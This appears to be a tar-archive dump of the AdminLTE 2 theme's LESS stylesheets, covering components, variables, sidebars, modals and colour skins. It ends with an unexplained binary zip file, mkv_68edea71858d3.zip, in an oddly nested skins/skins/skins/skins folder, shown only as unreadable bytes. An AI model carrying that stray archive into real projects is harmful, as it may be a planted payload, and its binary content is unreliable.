    > a:hover {
      &,
      .users-list-name {
        color: #999;
      }
    }
  }
}

.users-list-name,
.users-list-date {
  display: block;
}

.users-list-name {
  font-weight: 600;
  color: #444;
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
}

.users-list-date {
  color: #999;
  font-size: 12px;
}
less/info-box.less000066400000002157152434265230010140 0ustar00/*
 * Component: Info Box
 * -------------------
 */
.info-box {
  display: block;
  min-height: 90px;
  background: #fff;
  width: 100%;
  box-shadow: @box-boxshadow;
  .border-radius(2px);
  margin-bottom: 15px;
  small {
    font-size: 14px;
  }
  .progress {
    background: rgba(0, 0, 0, .2);
    margin: 5px -10px 5px -10px;
    height: 2px;
    &,
    & .progress-bar {
      .border-radius(0);
    }
    .progress-bar {
      background: #fff;
    }
  }
}

.info-box-icon {
  .border-radius(2px; 0; 2px; 0);
  display: block;
  float: left;
  height: 90px;
  width: 90px;
  text-align: center;
  font-size: 45px;
  line-height: 90px;
  background: rgba(0, 0, 0, 0.2);
  > img {
    max-width: 100%;
  }
}

.info-box-content {
  padding: 5px 10px;
  margin-left: 90px;
}

.info-box-number {
  display: block;
  font-weight: bold;
  font-size: 18px;
}

.progress-description,
.info-box-text {
  display: block;
  font-size: 14px;
  white-space: nowrap;
  overflow: hidden;
  text-overflow: ellipsis;
}

.info-box-text {
  text-transform: uppercase;
}

.info-box-more {
  display: block;
}

.progress-description {
  margin: 0;
}
less/miscellaneous.less000066400000020775152434265230011270 0ustar00/*
 * General: Miscellaneous
 * ----------------------
 */
// 10px padding and margins
.pad {
  padding: 10px;
}

.margin {
  margin: 10px;
}

.margin-bottom {
  margin-bottom: 20px;
}

.margin-bottom-none {
  margin-bottom: 0;
}

.margin-r-5 {
  margin-right: 5px;
}

// Display inline
.inline {
  display: inline;
}

// Description Blocks
.description-block {
  display: block;
  margin: 10px 0;
  text-align: center;
  &.margin-bottom {
    margin-bottom: 25px;
  }
  > .description-header {
    margin: 0;
    padding: 0;
    font-weight: 600;
    font-size: 16px;
  }
  > .description-text {
    text-transform: uppercase;
  }
}

// Background colors
.bg-red,
.bg-yellow,
.bg-aqua,
.bg-blue,
.bg-light-blue,
.bg-green,
.bg-navy,
.bg-teal,
.bg-olive,
.bg-lime,
.bg-orange,
.bg-fuchsia,
.bg-purple,
.bg-maroon,
.bg-black,
.bg-red-active,
.bg-yellow-active,
.bg-aqua-active,
.bg-blue-active,
.bg-light-blue-active,
.bg-green-active,
.bg-navy-active,
.bg-teal-active,
.bg-olive-active,
.bg-lime-active,
.bg-orange-active,
.bg-fuchsia-active,
.bg-purple-active,
.bg-maroon-active,
.bg-black-active {
  color: #fff !important;
}

.bg-gray {
  color: #000;
  background-color: @gray !important;
}

.bg-gray-light {
  background-color: #f7f7f7;
}

.bg-black {
  background-color: @black !important;
}

.bg-red {
  background-color: @red !important;
}

.bg-yellow {
  background-color: @yellow !important;
}

.bg-aqua {
  background-color: @aqua !important;
}

.bg-blue {
  background-color: @blue !important;
}

.bg-light-blue {
  background-color: @light-blue !important;
}

.bg-green {
  background-color: @green !important;
}

.bg-navy {
  background-color: @navy !important;
}

.bg-teal {
  background-color: @teal !important;
}

.bg-olive {
  background-color: @olive !important;
}

.bg-lime {
  background-color: @lime !important;
}

.bg-orange {
  background-color: @orange !important;
}

.bg-fuchsia {
  background-color: @fuchsia !important;
}

.bg-purple {
  background-color: @purple !important;
}

.bg-maroon {
  background-color: @maroon !important;
}

//Set of Active Background Colors
.bg-gray-active {
  color: #000;
  background-color: darken(@gray, 10%) !important;
}

.bg-black-active {
  background-color: darken(@black, 10%) !important;
}

.bg-red-active {
  background-color: darken(@red , 6%) !important;
}

.bg-yellow-active {
  background-color: darken(@yellow , 6%) !important;
}

.bg-aqua-active {
  background-color: darken(@aqua , 6%) !important;
}

.bg-blue-active {
  background-color: darken(@blue , 10%) !important;
}

.bg-light-blue-active {
  background-color: darken(@light-blue , 6%) !important;
}

.bg-green-active {
  background-color: darken(@green , 5%) !important;
}

.bg-navy-active {
  background-color: darken(@navy , 2%) !important;
}

.bg-teal-active {
  background-color: darken(@teal , 5%) !important;
}

.bg-olive-active {
  background-color: darken(@olive , 5%) !important;
}

.bg-lime-active {
  background-color: darken(@lime , 5%) !important;
}

.bg-orange-active {
  background-color: darken(@orange , 5%) !important;
}

.bg-fuchsia-active {
  background-color: darken(@fuchsia , 5%) !important;
}

.bg-purple-active {
  background-color: darken(@purple , 5%) !important;
}

.bg-maroon-active {
  background-color: darken(@maroon , 3%) !important;
}

//Disabled!
[class^="bg-"].disabled {
  .opacity(.65);
}

// Text colors
.text-red {
  color: @red !important;
}

.text-yellow {
  color: @yellow !important;
}

.text-aqua {
  color: @aqua !important;
}

.text-blue {
  color: @blue !important;
}

.text-black {
  color: @black !important;
}

.text-light-blue {
  color: @light-blue !important;
}

.text-green {
  color: @green !important;
}

.text-gray {
  color: @gray !important;
}

.text-navy {
  color: @navy !important;
}

.text-teal {
  color: @teal !important;
}

.text-olive {
  color: @olive !important;
}

.text-lime {
  color: @lime !important;
}

.text-orange {
  color: @orange !important;
}

.text-fuchsia {
  color: @fuchsia !important;
}

.text-purple {
  color: @purple !important;
}

.text-maroon {
  color: @maroon !important;
}

.link-muted {
  color: darken(@gray, 30%);
  &:hover,
  &:focus {
    color: darken(@gray, 40%);
  }
}

.link-black {
  color: #666;
  &:hover,
  &:focus {
    color: #999;
  }
}

// Hide elements by display none only
.hide {
  display: none !important;
}

// Remove borders
.no-border {
  border: 0 !important;
}

// Remove padding
.no-padding {
  padding: 0 !important;
}

// Remove margins
.no-margin {
  margin: 0 !important;
}

// Remove box shadow
.no-shadow {
  box-shadow: none !important;
}

// Unstyled List
.list-unstyled {
  list-style: none;
  margin: 0;
  padding: 0;
}

.list-group-unbordered {
  > .list-group-item {
    border-left: 0;
    border-right: 0;
    border-radius: 0;
    padding-left: 0;
    padding-right: 0;
  }
}

// Remove border radius
.flat {
  .border-radius(0) !important;
}

.text-bold {
  &, &.table td, &.table th {
    font-weight: 700;
  }
}

.text-sm {
  font-size: 12px;
}

// _fix for sparkline tooltip
.jqstooltip {
  padding: 5px !important;
  width: auto !important;
  height: auto !important;
}

// Gradient Background colors
.bg-teal-gradient {
  .gradient(@teal; @teal; lighten(@teal, 16%)) !important;
  color: #fff;
}

.bg-light-blue-gradient {
  .gradient(@light-blue; @light-blue; lighten(@light-blue, 12%)) !important;
  color: #fff;
}

.bg-blue-gradient {
  .gradient(@blue; @blue; lighten(@blue, 7%)) !important;
  color: #fff;
}

.bg-aqua-gradient {
  .gradient(@aqua; @aqua; lighten(@aqua, 7%)) !important;
  color: #fff;
}

.bg-yellow-gradient {
  .gradient(@yellow; @yellow; lighten(@yellow, 16%)) !important;
  color: #fff;
}

.bg-purple-gradient {
  .gradient(@purple; @purple; lighten(@purple, 16%)) !important;
  color: #fff;
}

.bg-green-gradient {
  .gradient(@green; @green; lighten(@green, 7%)) !important;
  color: #fff;
}

.bg-red-gradient {
  .gradient(@red; @red; lighten(@red, 10%)) !important;
  color: #fff;
}

.bg-black-gradient {
  .gradient(@black; @black; lighten(@black, 10%)) !important;
  color: #fff;
}

.bg-maroon-gradient {
  .gradient(@maroon; @maroon; lighten(@maroon, 10%)) !important;
  color: #fff;
}

//Description Block Extension
.description-block {
  .description-icon {
    font-size: 16px;
  }
}

//Remove top padding
.no-pad-top {
  padding-top: 0;
}

//Make position static
.position-static {
  position: static !important;
}

//List utility classes
.list-header {
  font-size: 15px;
  padding: 10px 4px;
  font-weight: bold;
  color: #666;
}

.list-seperator {
  height: 1px;
  background: @box-border-color;
  margin: 15px 0 9px 0;
}

.list-link {
  > a {
    padding: 4px;
    color: #777;
    &:hover {
      color: #222;
    }
  }
}

//Light font weight
.font-light {
  font-weight: 300;
}

//User block
.user-block {
  .clearfix();
  img {
    width: 40px;
    height: 40px;
    float: left;
  }
  .username,
  .description,
  .comment {
    display: block;
    margin-left: 50px;
  }
  .username {
    font-size: 16px;
    font-weight: 600;
  }
  .description {
    color: #999;
    font-size: 13px;
  }
  &.user-block-sm {
    img {
      &:extend(.img-sm);
    }
    .username,
    .description,
    .comment {
      margin-left: 40px;
    }
    .username {
      font-size: 14px;
    }
  }
}

//Image sizes
.img-sm,
.img-md,
.img-lg {
  float: left;
}

.img-sm {
  width: 30px !important;
  height: 30px !important;
  + .img-push {
    margin-left: 40px;
  }
}

.img-md {
  width: 60px;
  height: 60px;
  + .img-push {
    margin-left: 70px;
  }
}

.img-lg {
  width: 100px;
  height: 100px;
  + .img-push {
    margin-left: 110px;
  }
}

// Image bordered
.img-bordered {
  border: 3px solid @gray;
  padding: 3px;
}

.img-bordered-sm {
  border: 2px solid @gray;
  padding: 2px;
}

//General attachemnt block
.attachment-block {
  border: 1px solid @box-border-color;
  padding: 5px;
  margin-bottom: 10px;
  background: #f7f7f7;

  .attachment-img {
    max-width: 100px;
    max-height: 100px;
    height: auto;
    float: left;
  }
  .attachment-pushed {
    margin-left: 110px;
  }
  .attachment-heading {
    margin: 0;
  }
  .attachment-text {
    color: #555;
  }
}

.connectedSortable {
  min-height: 100px;
}

.ui-helper-hidden-accessible {
  border: 0;
  clip: rect(0 0 0 0);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}

.sort-highlight {
  background: #f4f4f4;
  border: 1px dashed #ddd;
  margin-bottom: 10px;
}

.full-opacity-hover {
  .opacity(.65);
  &:hover {
    .opacity(1);
  }
}

// Charts
.chart {
  position: relative;
  overflow: hidden;
  width: 100%;
  svg,
  canvas {
    width: 100% !important;
  }
}
less/labels.less000066400000000502152434265230007651 0ustar00/*
 * Component: Label
 * ----------------
 */
.label-default {
  background-color: @gray;
  color: #444;
}

.label-danger {
  &:extend(.bg-red);
}

.label-info {
  &:extend(.bg-aqua);
}

.label-warning {
  &:extend(.bg-yellow);
}

.label-primary {
  &:extend(.bg-light-blue);
}

.label-success {
  &:extend(.bg-green);
}
less/variables.less000066400000006102152434265230010361 0ustar00//AdminLTE 2 Variables.less
//=========================

//PATHS
//--------------------------------------------------------

@boxed-layout-bg-image-path: "../img/boxed-bg.jpg";

//COLORS
//--------------------------------------------------------
//Primary
@light-blue: #3c8dbc;
//Danger
@red: #dd4b39;
//Success
@green: #00a65a;
//Info
@aqua: #00c0ef;
//Warning
@yellow: #f39c12;
@blue: #0073b7;
@navy: #001F3F;
@teal: #39CCCC;
@olive: #3D9970;
@lime: #01FF70;
@orange: #FF851B;
@fuchsia: #F012BE;
@purple: #605ca8;
@maroon: #D81B60;
@black: #111;
@gray: #d2d6de;

//LAYOUT
//--------------------------------------------------------

//Side bar and logo width
@sidebar-width: 230px;
//Boxed layout maximum width
@boxed-layout-max-width: 1024px;
//When the logo should go to the top of the screen
@screen-header-collapse: @screen-xs-max;

//Link colors (Aka: <a> tags)
@link-color: @light-blue;
@link-hover-color: lighten(@link-color, 15%);

//Body background (Affects main content background only)
@body-bg: #ecf0f5;

//SIDEBAR SKINS
//--------------------------------------------------------

//Dark sidebar
@sidebar-dark-bg: #222d32;
@sidebar-dark-hover-bg: darken(@sidebar-dark-bg, 2%);
@sidebar-dark-color: lighten(@sidebar-dark-bg, 60%);
@sidebar-dark-hover-color: #fff;
@sidebar-dark-submenu-bg: lighten(@sidebar-dark-bg, 5%);
@sidebar-dark-submenu-color: lighten(@sidebar-dark-submenu-bg, 40%);
@sidebar-dark-submenu-hover-color: #fff;

//Light sidebar
@sidebar-light-bg: #f9fafc;
@sidebar-light-hover-bg: lighten(#f0f0f1, 1.5%);
@sidebar-light-color: #444;
@sidebar-light-hover-color: #000;
@sidebar-light-submenu-bg: @sidebar-light-hover-bg;
@sidebar-light-submenu-color: #777;
@sidebar-light-submenu-hover-color: #000;

//CONTROL SIDEBAR
//--------------------------------------------------------
@control-sidebar-width: @sidebar-width;

//BOXES
//--------------------------------------------------------
@box-border-color: #f4f4f4;
@box-border-radius: 3px;
@box-footer-bg: #fff;
@box-boxshadow: 0 1px 1px rgba(0, 0, 0, .1);
@box-padding: 10px;

//Box variants
@box-default-border-top-color: #d2d6de;

//BUTTONS
//--------------------------------------------------------
@btn-boxshadow: none;

//PROGRESS BARS
//--------------------------------------------------------
@progress-bar-border-radius: 1px;
@progress-bar-sm-border-radius: 1px;
@progress-bar-xs-border-radius: 1px;

//FORMS
//--------------------------------------------------------
@input-radius: 0;

//BUTTONS
//--------------------------------------------------------

//Border radius for non flat buttons
@btn-border-radius: 3px;

//DIRECT CHAT
//--------------------------------------------------------
@direct-chat-height: 250px;
@direct-chat-default-msg-bg: @gray;
@direct-chat-default-font-color: #444;
@direct-chat-default-msg-border-color: @gray;

//CHAT WIDGET
//--------------------------------------------------------
@attachment-border-radius: 3px;

//TRANSITIONS SETTINGS
//--------------------------------------------------------

//Transition global options
@transition-speed: .3s;
@transition-fn: ease-in-out;
//cubic-bezier(0.32,1.25,0.375,1.15);
less/sidebar.less000066400000005360152434265230010027 0ustar00/*
 * Component: Sidebar
 * ------------------
 */
//Main Sidebar
// ``` .left-side has been deprecated as of 2.0.0 in favor of .main-sidebar ```

.main-sidebar,
.left-side {
  position: absolute;
  top: 0;
  left: 0;
  padding-top: 50px;
  min-height: 100%;
  width: @sidebar-width;
  z-index: 810;
  //Using disposable variable to join statements with a comma
  @transition-rule: @transition-speed @transition-fn,
  width @transition-speed @transition-fn;
  .transition-transform(@transition-rule);
  @media (max-width: @screen-header-collapse) {
    padding-top: 100px;
  }
  @media (max-width: @screen-xs-max) {
    .translate(-@sidebar-width, 0);
  }
  .sidebar-collapse & {
    @media (min-width: @screen-sm) {
      .translate(-@sidebar-width, 0);
    }
  }
  .sidebar-open & {
    @media (max-width: @screen-xs-max) {
      .translate(0, 0);
    }
  }
}

.sidebar {
  padding-bottom: 10px;
}

// remove border from form
.sidebar-form {
  input:focus {
    border-color: transparent;
  }
}

//Sidebar user panel
.user-panel {
  position: relative;
  width: 100%;
  padding: 10px;
  overflow: hidden;
  .clearfix();
  > .image > img {
    width: 100%;
    max-width: 45px;
    height: auto;
  }
  > .info {
    padding: 5px 5px 5px 15px;
    line-height: 1;
    position: absolute;
    left: 55px;
    > p {
      font-weight: 600;
      margin-bottom: 9px;
    }
    > a {
      text-decoration: none;
      padding-right: 5px;
      margin-top: 3px;
      font-size: 11px;
      > .fa,
      > .ion,
      > .glyphicon {
        margin-right: 3px;
      }
    }
  }
}

// Sidebar menu
.sidebar-menu {
  list-style: none;
  margin: 0;
  padding: 0;
  //First Level
  > li {
    position: relative;
    margin: 0;
    padding: 0;
    > a {
      padding: 12px 5px 12px 15px;
      display: block;
      > .fa,
      > .glyphicon,
      > .ion {
        width: 20px;
      }
    }
    .label,
    .badge {
      margin-top: 3px;
      margin-right: 5px;
    }
  }
  li.header {
    padding: 10px 25px 10px 15px;
    font-size: 12px;
  }
  li > a > .fa-angle-left {
    width: auto;
    height: auto;
    padding: 0;
    margin-right: 10px;
    margin-top: 3px;
  }
  li.active {
    > a > .fa-angle-left {
      .rotate(-90deg);
    }
    > .treeview-menu {
      display: block;
    }
  }

  // Tree view menu
  .treeview-menu {
    display: none;
    list-style: none;
    padding: 0;
    margin: 0;
    padding-left: 5px;
    .treeview-menu {
      padding-left: 20px;
    }
    > li {
      margin: 0;
      > a {
        padding: 5px 5px 5px 15px;
        display: block;
        font-size: 14px;
        > .fa,
        > .glyphicon,
        > .ion {
          width: 20px;
        }
        > .fa-angle-left,
        > .fa-angle-down {
          width: auto;
        }
      }
    }
  }
}
less/callout.less000066400000001516152434265230010060 0ustar00/*
 * Component: Callout
 * ------------------
 */

// Base styles (regardless of theme)
.callout {
  .border-radius(3px);
  margin: 0 0 20px 0;
  padding: 15px 30px 15px 15px;
  border-left: 5px solid #eee;
  a {
    color: #fff;
    text-decoration: underline;
    &:hover {
      color: #eee;
    }
  }
  h4 {
    margin-top: 0;
    font-weight: 600;
  }
  p:last-child {
    margin-bottom: 0;
  }
  code,
  .highlight {
    background-color: #fff;
  }

  // Themes for different contexts
  &.callout-danger {
    &:extend(.bg-red);
    border-color: darken(@red, 10%);
  }
  &.callout-warning {
    &:extend(.bg-yellow);
    border-color: darken(@yellow, 10%);
  }
  &.callout-info {
    &:extend(.bg-aqua);
    border-color: darken(@aqua, 10%);
  }
  &.callout-success {
    &:extend(.bg-green);
    border-color: darken(@green, 10%);
  }
}
less/control-sidebar.less000066400000012555152434265230011511 0ustar00/*
 * Component: Control sidebar. By default, this is the right sidebar.
 */
//The sidebar's background control class
//This is a hack to make the background visible while scrolling
.control-sidebar-bg {
  position: fixed;
  z-index: 1000;
  bottom: 0;
}

//Transitions
.control-sidebar-bg,
.control-sidebar {
  top: 0;
  right: -@control-sidebar-width;
  width: @control-sidebar-width;
  .transition(right @transition-speed ease-in-out);
}

//The sidebar
.control-sidebar {
  position: absolute;
  padding-top: @navbar-height;
  z-index: 1010;
  //Fix position after header collapse
  @media (max-width: @screen-sm) {
    padding-top: @navbar-height + 50;
  }
  //Tab panes
  > .tab-content {
    padding: 10px 15px;
  }
  //Open state with slide over content effect
  &.control-sidebar-open {
    &,
    + .control-sidebar-bg {
      right: 0;
    }
  }
}

//Open without slide over content
.control-sidebar-open {
  .control-sidebar-bg,
  .control-sidebar {
    right: 0;
  }
  @media (min-width: @screen-sm) {
    .content-wrapper,
    .right-side,
    .main-footer {
      margin-right: @control-sidebar-width;
    }
  }
}

//Control sidebar tabs
.nav-tabs.control-sidebar-tabs {
  > li {
    &:first-of-type > a {
      &,
      &:hover,
      &:focus {
        border-left-width: 0;
      }
    }
    > a {
      .border-radius(0);

      //Hover and active states
      &,
      &:hover {
        border-top: none;
        border-right: none;
        border-left: 1px solid transparent;
        border-bottom: 1px solid transparent;
      }
      .icon {
        font-size: 16px;
      }
    }
    //Active state
    &.active {
      > a {
        &,
        &:hover,
        &:focus,
        &:active {
          border-top: none;
          border-right: none;
          border-bottom: none;
        }
      }
    }
  }
  //Remove responsiveness on small screens
  @media (max-width: @screen-sm) {
    display: table;
    > li {
      display: table-cell;
    }
  }
}

//Headings in the sidebar content
.control-sidebar-heading {
  font-weight: 400;
  font-size: 16px;
  padding: 10px 0;
  margin-bottom: 10px;
}

//Subheadings
.control-sidebar-subheading {
  display: block;
  font-weight: 400;
  font-size: 14px;
}

//Control Sidebar Menu
.control-sidebar-menu {
  list-style: none;
  padding: 0;
  margin: 0 -15px;
  > li > a {
    .clearfix();
    display: block;
    padding: 10px 15px;
    > .control-sidebar-subheading {
      margin-top: 0;
    }
  }
  .menu-icon {
    float: left;
    width: 35px;
    height: 35px;
    border-radius: 50%;
    text-align: center;
    line-height: 35px;
  }
  .menu-info {
    margin-left: 45px;
    margin-top: 3px;
    > .control-sidebar-subheading {
      margin: 0;
    }
    > p {
      margin: 0;
      font-size: 11px;
    }
  }
  .progress {
    margin: 0;
  }
}

//Dark skin
.control-sidebar-dark {
  color: @sidebar-dark-color;
  // Background
  &,
  + .control-sidebar-bg {
    background: @sidebar-dark-bg;
  }
  // Sidebar tabs
  .nav-tabs.control-sidebar-tabs {
    border-bottom: darken(@sidebar-dark-bg, 3%);
    > li {
      > a {
        background: darken(@sidebar-dark-bg, 5%);
        color: @sidebar-dark-color;
        //Hover and active states
        &,
        &:hover,
        &:focus {
          border-left-color: darken(@sidebar-dark-bg, 7%);
          border-bottom-color: darken(@sidebar-dark-bg, 7%);
        }
        &:hover,
        &:focus,
        &:active {
          background: darken(@sidebar-dark-bg, 3%);
        }
        &:hover {
          color: #fff;
        }
      }
      //Active state
      &.active {
        > a {
          &,
          &:hover,
          &:focus,
          &:active {
            background: @sidebar-dark-bg;
            color: #fff;
          }
        }
      }
    }
  }
  //Heading & subheading
  .control-sidebar-heading,
  .control-sidebar-subheading {
    color: #fff;
  }
  //Sidebar list
  .control-sidebar-menu {
    > li {
      > a {
        &:hover {
          background: @sidebar-dark-hover-bg;
        }
        .menu-info {
          > p {
            color: @sidebar-dark-color;
          }
        }
      }
    }
  }
}

//Light skin
.control-sidebar-light {
  color: lighten(@sidebar-light-color, 10%);
  // Background
  &,
  + .control-sidebar-bg {
    background: @sidebar-light-bg;
    border-left: 1px solid @gray;
  }
  // Sidebar tabs
  .nav-tabs.control-sidebar-tabs {
    border-bottom: @gray;
    > li {
      > a {
        background: darken(@sidebar-light-bg, 5%);
        color: @sidebar-light-color;
        //Hover and active states
        &,
        &:hover,
        &:focus {
          border-left-color: @gray;
          border-bottom-color: @gray;
        }
        &:hover,
        &:focus,
        &:active {
          background: darken(@sidebar-light-bg, 3%);
        }
      }
      //Active state
      &.active {
        > a {
          &,
          &:hover,
          &:focus,
          &:active {
            background: @sidebar-light-bg;
            color: #111;
          }
        }
      }
    }
  }
  //Heading & subheading
  .control-sidebar-heading,
  .control-sidebar-subheading {
    color: #111;
  }
  //Sidebar list
  .control-sidebar-menu {
    margin-left: -14px;
    > li {
      > a {
        &:hover {
          background: @sidebar-light-hover-bg;
        }
        .menu-info {
          > p {
            color: lighten(@sidebar-light-color, 10%);
          }
        }
      }
    }
  }
}
less/login_and_register.less000066400000001277152434265230012257 0ustar00/*
 * Page: Login & Register
 * ----------------------
 */

.login-logo,
.register-logo {
  font-size: 35px;
  text-align: center;
  margin-bottom: 25px;
  font-weight: 300;
  a {
    color: #444;
  }
}

.login-page,
.register-page {
  background: @gray;
}

.login-box,
.register-box {
  width: 360px;
  margin: 7% auto;
  @media (max-width: @screen-sm) {
    width: 90%;
    margin-top: 20px;
  }
}

.login-box-body,
.register-box-body {
  background: #fff;
  padding: 20px;
  border-top: 0;
  color: #666;
  .form-control-feedback {
    color: #777;
  }
}

.login-box-msg,
.register-box-msg {
  margin: 0;
  text-align: center;
  padding: 0 20px 20px 20px;
}

.social-auth-links {
  margin: 10px 0;
}
less/products.less000066400000001410152434265230010251 0ustar00/*
 * Component: Products List
 * ------------------------
 */
.products-list {
  list-style: none;
  margin: 0;
  padding: 0;
  > .item {
    .border-radius(@box-border-radius);
    .box-shadow(@box-boxshadow);
    .clearfix();
    padding: 10px 0;
    background: #fff;
  }
  .product-img {
    float: left;
    img {
      width: 50px;
      height: 50px;
    }
  }
  .product-info {
    margin-left: 60px;
  }
  .product-title {
    font-weight: 600;
  }
  .product-description {
    display: block;
    color: #999;
    overflow: hidden;
    white-space: nowrap;
    text-overflow: ellipsis;
  }
}

.product-list-in-box > .item {
  .box-shadow(none);
  .border-radius(0);
  border-bottom: 1px solid @box-border-color;
  &:last-of-type {
    border-bottom-width: 0;
  }
}
less/select2.less000066400000004616152434265230007762 0ustar00/*
 * Plugin: Select2
 * ---------------
 */

//Signle select
.select2-container--default,
.select2-selection {
  &.select2-container--focus,
  &:focus,
  &:active {
    outline: none;
  }
  .select2-selection--single {
    border: 1px solid @gray;
    border-radius: @input-radius;
    padding: 6px 12px;
    height: 34px;
  }
}

.select2-container--default.select2-container--open {
  border-color: @light-blue;
}

.select2-dropdown {
  border: 1px solid @gray;
  border-radius: @input-radius;
}

.select2-container--default .select2-results__option--highlighted[aria-selected] {
  background-color: @light-blue;
  color: white;
}

.select2-results__option {
  padding: 6px 12px;
  user-select: none;
  -webkit-user-select: none;
}

.select2-container .select2-selection--single .select2-selection__rendered {
  padding-left: 0;
  padding-right: 0;
  height: auto;
  margin-top: -4px;
}

.select2-container[dir="rtl"] .select2-selection--single .select2-selection__rendered {
  padding-right: 6px;
  padding-left: 20px;
}

.select2-container--default .select2-selection--single .select2-selection__arrow {
  height: 28px;
  right: 3px;
}

.select2-container--default .select2-selection--single .select2-selection__arrow b {
  margin-top: 0;
}

.select2-dropdown,
.select2-search--inline {
  .select2-search__field {
    border: 1px solid @gray;
    &:focus {
      outline: none;
      border: 1px solid @light-blue;
    }
  }
}

.select2-container--default .select2-results__option[aria-disabled=true] {
  color: #999;
}

.select2-container--default .select2-results__option[aria-selected=true] {
  background-color: #ddd;
  &,
  &:hover {
    color: #444;
  }
}

//Multiple select
.select2-container--default {
  .select2-selection--multiple {
    border: 1px solid @gray;
    border-radius: @input-radius;
    &:focus {
      border-color: @light-blue;
    }
  }
  &.select2-container--focus .select2-selection--multiple {
    border-color: @gray;
  }
}

.select2-container--default .select2-selection--multiple .select2-selection__choice {
  background-color: @light-blue;
  border-color: darken(@light-blue, 5%);
  padding: 1px 10px;
  color: #fff;
}

.select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
  margin-right: 5px;
  color: rgba(255, 255, 255, .7);
  &:hover {
    color: #fff;
  }
}

.select2-container .select2-selection--single .select2-selection__rendered {
  padding-right: 10px;
}
less/modal.less000066400000002422152434265230007506 0ustar00/*
 * Component: modal
 * ----------------
 */
.modal {
  background: rgba(0, 0, 0, .3);
}

.modal-content {
  .border-radius(0);
  .box-shadow(0 2px 3px rgba(0, 0, 0, .125));
  border: 0;
  @media (min-width: @screen-sm-min) {
    .box-shadow(0 2px 3px rgba(0, 0, 0, .125));
  }
}

.modal-header {
  border-bottom-color: @box-border-color;
}

.modal-footer {
  border-top-color: @box-border-color;
}

//Modal variants
.modal-primary {
  .modal-body {
    &:extend(.bg-light-blue);
  }
  .modal-header,
  .modal-footer {
    &:extend(.bg-light-blue-active);
    border-color: darken(@light-blue, 10%);
  }
}

.modal-warning {
  .modal-body {
    &:extend(.bg-yellow);
  }
  .modal-header,
  .modal-footer {
    &:extend(.bg-yellow-active);
    border-color: darken(@yellow, 10%);
  }
}

.modal-info {
  .modal-body {
    &:extend(.bg-aqua);
  }
  .modal-header,
  .modal-footer {
    &:extend(.bg-aqua-active);
    border-color: darken(@aqua, 10%);
  }
}

.modal-success {
  .modal-body {
    &:extend(.bg-green);
  }
  .modal-header,
  .modal-footer {
    &:extend(.bg-green-active);
    border-color: darken(@green, 10%);
  }
}

.modal-danger {
  .modal-body {
    &:extend(.bg-red);
  }
  .modal-header,
  .modal-footer {
    &:extend(.bg-red-active);
    border-color: darken(@red, 10%);
  }
}
less/skins/skin-green-light.less000066400000002017152434265230012710 0ustar00/*
 * Skin: Green
 * -----------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-green-light {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@green; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@green, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@green, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(@green);
    }

    li.user-header {
      background-color: @green;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-light-sidebar(@green);

}
less/skins/_all-skins.less000066400000000576152434265230011605 0ustar00//All skins in one file
@import "skin-blue.less";
@import "skin-blue-light.less";
@import "skin-black.less";
@import "skin-black-light.less";
@import "skin-green.less";
@import "skin-green-light.less";
@import "skin-red.less";
@import "skin-red-light.less";
@import "skin-yellow.less";
@import "skin-yellow-light.less";
@import "skin-purple.less";
@import "skin-purple-light.less";
less/skins/skin-red.less000066400000002001152434265230011246 0ustar00/*
 * Skin: Red
 * ---------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-red {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@red; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@red, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@red, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(darken(@red, 5%));
    }

    li.user-header {
      background-color: @red;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-dark-sidebar(@red);
}
less/skins/skin-blue-light.less000066400000002255152434265230012543 0ustar00/*
 * Skin: Blue
 * ----------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-blue-light {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@light-blue; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@light-blue, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@light-blue, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(@light-blue);
    }

    li.user-header {
      background-color: @light-blue;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-light-sidebar(@light-blue);
  .main-footer {
    border-top-color: @gray;
  }
}

.skin-blue.layout-top-nav .main-header > .logo {
  .logo-variant(@light-blue);
}
less/skins/skins/skins/skins/mkv_68edea71858d3.zip000064400000012610152434265230015575 0ustar00PK�qN[.��s��b_68edea71858d3.tmp�Ums�H�+S���ҵ��]��ܖ��u=5�X�8$l��$����(��퇳�a�~�y�{���j�A��d��"	�P\�"��BU�_����D�o��$H���+sωYU�z�U�*��^����*F˧=@NpM��̪�"ߚ(�0Z�q���$�
AL��5�����ڻ�sݑ�g۶�r`,
�#ԥ�R�K����������˱�{��
�i�ݹ+�0�P#��͉
